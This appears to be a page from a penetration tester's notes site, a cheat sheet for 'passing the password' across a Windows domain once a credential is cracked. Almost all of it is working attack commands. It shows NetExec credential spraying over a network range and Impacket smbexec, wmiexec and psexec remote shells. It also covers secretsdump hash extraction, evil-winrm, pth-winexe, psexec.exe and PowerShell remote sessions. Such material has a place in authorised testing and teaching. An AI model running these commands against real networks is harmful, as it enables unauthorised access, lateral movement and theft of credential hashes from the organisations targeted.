Skip to main content

Pass the Password

Overview

Cracked a hash or discovered a password for a domain user. Use the password and nxc to pass it around the network and see if we can log into any other target(s) with that credential


NetExec

nxc smb <target-or-CIDR> -d 'domain.tld' -u username -p password

Pass the password of a domain user

nxc smb <target-or-CIDR> --local-auth -u username -p password

Pass the password of a local user

 

Impacket Toolkit

Kali Linux developers have created a series of wrappers around Impacket scripts. In most cases, you can run impacket-scriptName -- e.g. impacket-getTGT -- to invoke getTGT.py. In any case, you can find the original Impacket scripts under /usr/share/doc/python3-impacket/examples/.

impacket-smbexec

impacket-smbexec 'domain.tld/user.name:password@target'

impacket-smbexec wrapper on Kali Linux

impacket-wmiexec

impacket-wmiexec 'domain.tld/user.name:password@target' cmd.exe

impacket-wmiexec wrapper on Kali Linux

impacket-psexec

impacket-psexec 'domain.tld/user.name:password@target' cmd.exe

impacket-psexec wrapper on Kali Linux

 

impacket-secretsdump

impacket-secretsdump 'domain.tld/user.name:password@target'

impacket-secretsdump wrapper on Kali Linux

Example Output (show / hide)

Pasted image 20211226200559.png

 

 

WinRM

  • WinRM over HTTP – TCP/5985
  • WinRM over HTTPS – TCP/5986
evil-winrm -i <target_ip> -u username -p password

 

Passing-the-Hash Suite

pth-winexe

pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe

 

Windows Binaries

psexec.exe

Requires psexec.exe binary on a Windows host

# Start a remote command prompt
.\psexec.exe \\target-ip -u username -p password -i cmd.exe
            |                                                |
            | 1. Upload psexecsvc.exe via ADMIN$ share ====> |
            |                                                |
[attacker]  | 2. Create and execute psexec service ========> | [target]
            |                                                |
            | 3. <======== Communicate via \.\pipe\psexecsvc |
            |                                                |

PowerShell PSSession

Interactive Session

$username = 'user.name'
$password = 'mypass' | ConvertTo-SecureString -AsPlainText -Force
$credential = [pscredential]::new($username, $password)
$session = New-PSSession -ComputerName target-ip -Credential $credential
$session | Enter-PSSession

# When finished
$session | Remove-PSSession

Ad-Hoc Commands

$username = 'user.name'
$password = 'mypass' | ConvertTo-SecureString -AsPlainText -Force
$credential = [pscredential]::new($username, $password)
Invoke-Command -ComputerName target-ip -Credential $credential -ScriptBlock {Get-ComputerInfo}
Back to top